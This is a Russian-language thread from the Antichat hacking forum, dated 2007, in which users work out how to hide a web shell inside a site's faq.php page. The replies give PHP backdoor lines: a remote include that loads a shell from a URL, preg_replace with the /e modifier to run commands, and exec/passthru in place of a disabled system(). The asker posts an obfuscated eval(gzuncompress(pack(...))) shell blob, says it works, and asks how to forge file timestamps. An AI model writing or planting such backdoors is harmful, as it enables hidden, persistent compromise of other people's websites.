ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Как спрятать шелл внутри страницы?
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Как спрятать шелл внутри страницы?
  #1  
Старый 05.08.2007, 18:29
Аватар для FaR-G9
FaR-G9
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935

Репутация: 64
Отправить сообщение для FaR-G9 с помощью ICQ
По умолчанию Как спрятать шелл внутри страницы?
Еще один вопрос
как можно спрятать полноценный шелл внутри страницы?
Т.е. если заходишь faq.php - была страница faq,
а если faq.php?shell - открывался шелл
Нужен именно полноценный, а не такой типа system($_GET["cmd"]);
и без инклуда
 
Ответить с цитированием

  #2  
Старый 05.08.2007, 18:35
Аватар для ENFIX
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию
сделай удаленный инклуд
PHP код:
if(isset($_GET['shell'])) include ($_GET['shell']); 
 
Ответить с цитированием

  #3  
Старый 05.08.2007, 18:44
Аватар для FaR-G9
FaR-G9
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935

Репутация: 64
Отправить сообщение для FaR-G9 с помощью ICQ
По умолчанию
там функция инклуд снесена ((
 
Ответить с цитированием

  #4  
Старый 05.08.2007, 18:47
Аватар для ENFIX
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию
какие там функции отключены?
 
Ответить с цитированием

  #5  
Старый 05.08.2007, 18:51
Аватар для FaR-G9
FaR-G9
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935

Репутация: 64
Отправить сообщение для FaR-G9 с помощью ICQ
По умолчанию
mb_send_mail,error_log,symlink,include,system
 
Ответить с цитированием

  #6  
Старый 05.08.2007, 18:58
Аватар для ENFIX
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию
PHP код:
 if(isset($_GET['shell'])) require($_GET['shell']); 
пример:
Код:
site.com/faq.php?shell=http://site.domen/shell.txt
 
Ответить с цитированием

  #7  
Старый 05.08.2007, 19:14
Аватар для FaR-G9
FaR-G9
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935

Репутация: 64
Отправить сообщение для FaR-G9 с помощью ICQ
По умолчанию
Что-то инклудится не хочет. Показывает пустой экран
Тогда другой вопрос, какими еще функциями(кроме system) можно выполнять команды
например wget и ls -la
И еще, можно-ли изменить дату редактирования файла без system() ?
Последний раз редактировалось FaR-G9; 05.08.2007 в 19:18..
 
Ответить с цитированием

  #8  
Старый 05.08.2007, 19:22
Аватар для ENFIX
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию
exec(), passthru()
 
Ответить с цитированием

  #9  
Старый 05.08.2007, 19:31
Аватар для NuR
NuR
Участник форума
Регистрация: 11.12.2005
Сообщений: 160
Провел на форуме:
745130

Репутация: 159
Отправить сообщение для NuR с помощью ICQ
По умолчанию
попробуй так:
Цитата:
preg_replace("#blah#e", $_GET['cmd'], "blah");
обращаться как 123.php?c=passthru(dir)
параметры интерпритируються как пхп код
 
Ответить с цитированием

  #10  
Старый 05.08.2007, 19:31
Аватар для FaR-G9
FaR-G9
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935

Репутация: 64
Отправить сообщение для FaR-G9 с помощью ICQ
По умолчанию
Огромное Спасибо ENFIX
Я догадался, как засунуть код шелла на станицу
PHP код:
if(isset($_GET['shell'])) eval(gzuncompress(pack("H*",'789ced7d6b731b4792e06733c2ffa1d483710316000220f826684a244551a2449aa4244ba216d1e86e022d0268b81be043b6fedbdec646ecc65eecedcedcfd005a23ae693d284ada19df861de3cbac47775577032465cfcccec5302c03a8ca57656565bdb36ccf73bdaa67775cafebb4ebe94266fae321dfee565b46dd31ab5ff6dcaeed57bd5ebbebb46c963b87d9f8b3da745a4e97273a6da70a1969bd65ec57ed7ddbec751db74de1f46c04c4ed753bbd6eb5d6dbdeb63de0ca0152beb16d575bae65930aa1d075840e52750ab46b7b3e500610bd981f29ea90e66ca7796ad5745b1dc3b3d39d468727a53359a297f3c57c41cf904a85e48a998f87c857f02f555d5bddd82404487d92babeb9b9467f57ef5e59df98a6d94b8b981b66c36f29776371fdeee27a98cb7e4b00f3abab3797174300f63b00788a8293f45c3daaed7ac74c678490dbae671b6683a4b9b4864f523b95d9d42e0250085e8e87a99d47c0cbef7a4ec76f1a7ec3f6d300859c90954c880b96488ae50d244698f054ef29a3d76da05a8b19a48005bae4f858cb42410ff5b5eb6bd52b7736af57ef408afe2843befe9ab4acd10110972a9554db68d90320d7ee71b88ee1fbb400ac04a4611b96eda5f57bf7eee5ae80703698ae6974ed2972d5f01d9380169aad8ae68d8e43a99a4d4d67a50af0b0aa86c15a48b9502477da583ed7739ed89600b4f7c1e8b599daec8c411a9ebd5d6974bb9da9e161cfefe6775dc7ca7bbd59417d66d8982553e48a69dabe4f16ecb6635b33c3b5598dd302353e850f306b648f363d73299723fff4fcf4f0d9db77cfde7f9725ff70f8f62792cbcd7e3c34d3e8b69af41360f1b3eb749bb6c48bfd868c96dd05d940ac9cfd65cfd9ad68f36ebb0b8ac86d1e746c8d98ec5745ebdafbdd61a43a4dcc86e141b555f69cb6e5eef9b96269b4a8cd622dcf6c6cde5f5984af5d0f557c75757d61713db7bebc747d738a905f19f48f143bfbc4779b8e351d806caeae4d61fbf9954dff92405616af2191412057573737576f4d253232dda6eb415681fe4102e8b36bfd354899ef1ab5a65d0c459d2285ce3ed2bb327f73697df5ceed85dcfceaca2aa4ff6aa1bc50989fe84bc84aa0b20d353c45c63b5d72d7f62ca36df4c5f612b013d58af2caa08a36c0a383f17c80f84e1b7a82a40adba67f032b6c92fe0dacb0fe20418525318a17c22edb056b22d0ecc4999af5eda66dfeff56325eb45e0dfa7dc5166abd6ed76d379c7aa309ffbaa474864d044cf71cabdb982223855ff7b33b7051d0a11b7f7d9abce6ecdb967fe0939adbece706aeae2edcc792b50cafeeb4a790431264cd3077ea9edb6b5b39911730032a57a69a4e7b877cc504f16c6b9a6c2e7eb1995b589c5f5dbfb2b9bc7a7b8ab4ddb64d41771ddfe9dae024c9b9c00db3ebecdae7a4dd7061d045be6232d69a3d7bba1fecccb0e855667c1306195dd234daf59e51b72b5bfa6363d760a95b3a406cf7da260e2649c3b1ecaae5eca61d0b7a7cdadd5baed96b415f968751d462d3c6af570f962d84c8fbdd83a69db71cbfd3340ea06fddd291f9963ead209aaebbe3d815c7babca5570ad334fba9c4d46fb87b3f8b69ade99a3b03b916e35ca13b6ed76961fdaec419c75717e01e96998d9094c25081eca66fb32c59b94c9899615609b3faf4900983409f3c713adb4ed3e6c210b26b782465195dc3b74d42d858d9f03ce320cdc7370cc2ec7a4d20edf587b0dded6a005521dad6fe68616bbf5cdbda2f8cc2bf31f85790ff69323234afaabbbd0dce86922ff0bc4097bdb6b35f5a70fd4d9cc2a4f017ce4a1032c3c78cf42f85a95436c892e128e06704d40d45b5d31918d089ef0194280dfe612585c41eea07f0457f44664871724265a9b20d2069311078ba3f68cb6d3348041d0467190701c901700db7e7f91430d460223da7dd83498afee80c38b008b76dc5e1e8ec81ff7976b7e7b5493a495b39aead9919521a852983aa52567acc2bc6f3588921b3380699aa88f8974e2a378227d00a4a0bf97131c242cecec20c88175314313040c3b2ae41b349d3a69225746a9365daa256c8c06553a4931f56693007c3f979d330edb4beb5a5c36c7658e74464ab4b59941ec5b16cb361ef83a80dc7cfcdaaf64fad554104508bcba26fedeb24cf693d1c7b147e1f7f145724816c15a32c618c9e0ba324618c9c0ba32061141f4905b1778d665a978ba351b 
Работает!!!
Только остался один вопрос
Можно ли изменить дату изменения файлов?
Последний раз редактировалось FaR-G9; 05.08.2007 в 19:36..
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
как спрятать программу в ДиспетчереЗадач? x-treem С/С++, C#, Delphi, .NET, Asm 28 01.06.2007 09:44
Есть админка от форума VBulletin 3.5.4. как и какой можно туда залить шелл? MrYumor Форумы 10 11.01.2007 20:06
Как спрятать троян? Macroeject Болталка 6 07.05.2006 13:56



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ